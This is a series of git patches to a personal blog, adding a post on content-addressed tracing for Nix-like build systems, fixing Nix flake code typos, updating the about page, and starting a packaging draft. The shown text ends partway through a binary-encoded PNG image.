From 0c81e45ce4534db508ef77ce775830e0b7f49c16 Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Sat, 27 Jan 2024 19:42:48 -0800 Subject: [PATCH 01/10] build systems Content --- content/posts/build-systems-ca-tracing.md | 249 ++++++++++++++++++++++ 1 file changed, 249 insertions(+) create mode 100644 content/posts/build-systems-ca-tracing.md diff --git a/content/posts/build-systems-ca-tracing.md b/content/posts/build-systems-ca-tracing.md new file mode 100644 index 0000000..769c688 --- /dev/null +++ b/content/posts/build-systems-ca-tracing.md @@ -0,0 +1,249 @@ ++++ +date = "2024-01-27" +draft = false +path = "/blog/build-systems-ca-tracing" +tags = ["build-systems", "nix"] +title = "Build systems: content addressed tracing" ++++ + +An idea I have lying around is something I am going to call "ca-tracing" for +the purposes of this post. The concept is to instrument builds and observe what +they actually did, and record that for future iterations such that excess +dependencies can be ignored if, *even if inputs changed*, the instructions are +the same and the files actually observed by the build are the same. + +# Implementation + +## Assumptions + +This idea assumes a hermetic build system, since we need to know if anything +might have differed from build to build, so we need a complete accounting of +the inputs to the build. It is not necessarily the case that such a hermetic +build system would be Nix-like, however, it is easiest to describe on top of a +Nix-like; first one with build identity, then one that lacks build identity +like Nix. + +This also assumes a content-addressed build system with early cut-off like Nix +with [ca-derivations]. In Nix's case, input-addressed builds are executed, then +renamed to a content-addressed path: if a build with different inputs is +executed once more with the same output, it is recorded as resolving to that +output, and further builds are cut off. + +[ca-derivations]: https://www.tweag.io/blog/2021-12-02-nix-cas-4/ + + + +## Conceptual implementation + +Conceptually, a build is a function: + +> (*inputs*, *instructions*) -> *outputs* + +We wish to narrow *inputs* to *inputsactual*, and save this +information alongside *outputs*. In a following build, we can then verify if +*instructions'* matches a previous build (*instructions*) and if so, extract +the values of the same dynamically observed *inputs'actual*, but +relative to *inputs'* and compare them to the values of +*inputsactual* from the previous build. + +Since our build system is hermetic, if this hits cache, it can be assumed to have +identical results, modulo any nondeterminism (which we assume to be +unfortunate but unproblematic, and is there regardless of this technique). + +## Making it concrete + +A build ("derivation" in Nix) in a Nix-like system is a specification of: + +* Inputs (files, other derivations) +* Environment variables +* Command to execute + +The point of ca-tracing is to remove excess inputs, so let's contemplate how to +do that. + +### File names + +The inputs are files named based on `hash(contents)` in Nix, but we don't +know which contents we will actually access. This is a problem, since the file +paths of *inputs* need to remain constant across multiple executions of the +build (the paths for *inputs* must equal the paths for *inputs'*), since the +part of *inputs* that changed may be irrelevant to this build. + +In a system that doesn't look like Nix, the input file paths might be the same +across two builds on account of not containing hashes, so this would not be a +problem. + +We can solve the file names problem by replacing the hash parts in the input +filenames with random values per-run. These hashes should never appear, even in +part, in the output, if the builder is not doing things with them that would +render the build non-deterministic. + +Unfortunately the file names may appear in the output through the ordering of +deterministic hash tables, for instance, which could be a problem; this exists +in practice in ELF hash tables for instance. Realistically we would need +file-type-specific rewriters to fixup execution output to a deterministic +result following multiple runs. + +We would also have to rewrite those hashes within blocks of data read from +within the builder, but that's *possibly* just a few FUSE crimes away to be +able to do live, on-demand. + +Following the build, the temporary hashes of the inputs can be substituted for +their concrete values pointing to the larger inputs †. + + + +### Tracing, filesystem + +To trace a build, one would have to pull the filesystem activity. This is +possible with some BPF tracing constrained to some cgroup on Linux, so that is +not the hard part. + +The data that would have to be known is: + +* Observed directory listings with hashes +* Read file names matching *inputs*, with associated hashes +* Extremely annoyingly: `fstat(2)` results for all queried files in inputs + (this is extremely annoying because everything calls `fstat` all the time + pointlessly or to check for files being present, and it includes things like + the length of a file, which could *in principle* cause unsoundness if not + recorded). + +This would then all be compared to the equivalent paths in *inputs'* and if the +hashes match, the previous build could be immediately used. + +## Avoiding build identity; how would this work in Nix? + +Nix is built on top of an on-disk key-value store (namely, the directory +`/nix/store`), which is a mapping: + +> Hash -> Value + +Thus, we just need to construct a hash in such a way that both Build and Build' +get the same hash value. + +We could achieve this by modifying the derivation in a deterministic manner +such that two modified-derivations share a hash if they could plausibly have +ca-tracing applied. Specifically, rewrite the input hashes to something like +the following: + +> hash("ca-tracing" + name + position-in-inputs) + "-" + name + +When a build is invoked, modify the derivation, hash it, and check for the +presence of a record of a modified-derivation of the same hash, and then check +if the actually-used filesystem objects when applied to *inputs'* remain the +same. + +# Use cases + +This idea is almost certainly best suited for builds using the smallest +possible unit of work, both in terms of usefulness and likelihood of bugs in +the rewriting. To use the terminology from [Build Systems à la Carte][bsalc], +it is likely most useful for systems that are closer to constructive traces +than deep constructive traces. + +[bsalc]: https://www.microsoft.com/en-us/research/uploads/prod/2018/03/build-systems.pdf + +For example, if this is applied to individual compiler jobs in a C++ project, +it can eliminate rebuilds from imprecise build system dependency tracking, +whereas if the derivation/unit of work is larger, the rebuild might be +necessary anyway. + +# Problems + +* There could exist multiple instances of a modified-derivation with different + filesystem activity, due to, say, a bunch of rebuilds against very + differently patched inputs. This system would have to be able to either + represent that or just discard old ones. +* Real programs abuse `fstat(2)` way too much and it's very likely that this + whole thing might not actually get any cache hits in practice if `fstat` + calls are considered. Without visibility into processes we cannot know if + `fstat` calls' results are actually used for anything more than checking if a + file exists. + + This might benefit from some limited dynamic tracing inside processes to + determine whether the fstat result is actually read. +* The whole enterprise is predicated on generalized sound rewriting, which is + likely very hard; see below. + +## Naive rewriting is a bad idea + +The implementation of ca-derivations itself, where it just rewrites hashes +appearing in random binaries with the moral equivalent of `sed`, is extremely +unsound with respect to compression, ordered structures (even NAR files would +fall victim to this), and any other kind of non-literal storage of store paths, +and this approach just adds yet more naive rewriting that is likely to explode +spectacularly at runtime. + +Naively rewriting store paths is an extension of the original idea of Nix doing +runtime dependencies by naively scanning for reference paths. However, +crucially, the latter does not *modify* random binaries without any knowledge +of their contents, and the worst case scenario for that reference scanning is a +runtime error when someone downloads a binary package. + +Realistically, this would have to be done with a "[diffoscope] of rewriters", +which can parse any format and rewrite references in it. We can check soundness of a +build under rewriting by simply running it more times. The rewriter need +not be a trusted component, since its impact is only as far as breaking your +binaries (reproducibly so), which Nix is great at already! + +In an actual implementation, I would even go so far as saying the rewriter +*must not* be part of Nix since it is generally useful, and it is fundamentally +something that would have to move pretty fast and perhaps even have per-project +modifications such that it cannot possibly be in a Nix stability guarantee. + +[diffoscope]: https://diffoscope.org/ + +# Related work + +This is essentially the idea of edef's incomplete project [Ripple], an +arbitrary-program memoizer, among other work, but significantly scaled down to +be less general and possibly more feasible. Compared to her project, this idea +doesn't look into processes at all, and simply involves tracing filesystem +accesses to read-only resources in an already-hermetic build system. + +Thanks to edef for significant feedback and discussion about this post. You can +[sponsor her on GitHub here][edef-gh] if you want to support her work on making +computers more sound such as the Nix content addressed cache project, tvix, and +also her giving these ideas to Arch Linux developers. + +[edef-gh]: https://github.com/sponsors/edef1c + +[Ripple]: https://nlnet.nl/project/Ripple/ + From ad7288ed419340b83fc119700711687b68cafbfb Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Tue, 13 Feb 2024 14:39:25 -0800 Subject: [PATCH 02/10] fix typo in flakes --- content/posts/flakes-arent-real.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/content/posts/flakes-arent-real.md b/content/posts/flakes-arent-real.md index 20648e0..9e16e7b 100644 --- a/content/posts/flakes-arent-real.md +++ b/content/posts/flakes-arent-real.md @@ -167,11 +167,12 @@ even if the same package name appears in both. Magic ✨ That is, in the following intentionally-flawed-for-other-reasons `flake.nix`: ```nix -{...}: { +{ + # .... outputs = { nixpkgs, ... }: - let pkgs = nixpkgs.legacyPackages.x86_64-linux; - in { - packages.x86_64-linux.x = pkgs.callPackage ./package.nix { }; + let pkgs = nixpkgs.legacyPackages.x86_64-linux; + in { + packages.x86_64-linux.x = pkgs.callPackage ./package.nix { }; }; } ``` From 9cdbf1eaf19096380fe4ddf633732329259aa0b1 Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Tue, 13 Feb 2024 14:43:13 -0800 Subject: [PATCH 03/10] wow another typo --- content/posts/flakes-arent-real.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/content/posts/flakes-arent-real.md b/content/posts/flakes-arent-real.md index 9e16e7b..01df387 100644 --- a/content/posts/flakes-arent-real.md +++ b/content/posts/flakes-arent-real.md @@ -464,11 +464,11 @@ nixosConfigurations.something = nixpkgs.lib.nixosSystem { specialArgs = { myPkgs = nixpkgs; }; - modules = { - { pkgs, lib, myPkgs }: { + modules = [ + ({ pkgs, lib, myPkgs }: { # do something with myPkgs - } - }; + }) + ]; } ``` From e9e9a55b51a505c8e5257b268b374c3d7547d1b2 Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Wed, 14 Feb 2024 00:17:19 -0800 Subject: [PATCH 04/10] update about page --- content/posts/about.md | 25 ++++++++++++++----------- templates/base.html | 2 ++ 2 files changed, 16 insertions(+), 11 deletions(-) diff --git a/content/posts/about.md b/content/posts/about.md index d94e758..862ba16 100644 --- a/content/posts/about.md +++ b/content/posts/about.md @@ -9,20 +9,23 @@ isPage = true +++ Hi! -I'm an undergraduate student in Computer Engineering at the University of -British Columbia. +I'm an final-year undergraduate student in Computer Engineering at the +University of British Columbia. -I have done mechanical design for ThunderBots, a RoboCup Small Size League team -building soccer-playing robots. Prior to this, I was on a 4 person team -participating in Skills Canada Robotics, and in my last year of high school, we -had the opportunity to [go to Nationals in -Halifax](/blog/i-competed-in-skills-canada-robotics), where we achieved first -place for Saskatchewan. +In my spare time, when I am not dreaming of all computers landing on the sun, I +work on [NixOS](https://nixos.org) in various places in the project, and a +whole slew of projects you can find on my GitHub profile. I'm most interested +in compilers, operating systems, and build systems. I am a full stack +developer: I can competently write both SystemVerilog and websites, and most +things in between: programming languages are a dime a dozen and I speak a lot +of them, from Rust to Haskell, C/C++, Python, to Fake Haskell That Compiles to +Bash (Nix). I often cosplay (perhaps too successfully) as a build engineer. -Other than robotics, I am most interested in Rust and embedded systems, -especially the security thereof. +When I *am* dreaming of computers experiencing solar destruction, I like +sewing, going on long walks, and cooking. -To contact me, email `jade` at this domain (jade dot fyi). +To contact me, email `jade` at this domain (jade dot fyi) or ping me [on +fedi](https://hachyderm.io/@leftpaddotpy). Jade she/they diff --git a/templates/base.html b/templates/base.html index dc1baf1..b5ec4b0 100644 --- a/templates/base.html +++ b/templates/base.html @@ -17,6 +17,8 @@ + + {{ config.title }} From 06267b2bf7ababe804e915dd569a9a28c4472351 Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Sun, 10 Mar 2024 18:56:14 -0700 Subject: [PATCH 05/10] packaging draft --- .../antifa-demon-core.png | Bin 0 -> 137053 bytes .../packaging-is-extremely-hard/index.md | 256 ++++++++++++++++++ 2 files changed, 256 insertions(+) create mode 100644 content/posts/packaging-is-extremely-hard/antifa-demon-core.png create mode 100644 content/posts/packaging-is-extremely-hard/index.md diff --git a/content/posts/packaging-is-extremely-hard/antifa-demon-core.png b/content/posts/packaging-is-extremely-hard/antifa-demon-core.png new file mode 100644 index 0000000000000000000000000000000000000000..ec6c1bd6ce1695d9e69d95b6a930b75fcb3438a7 GIT binary patch literal 137053 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 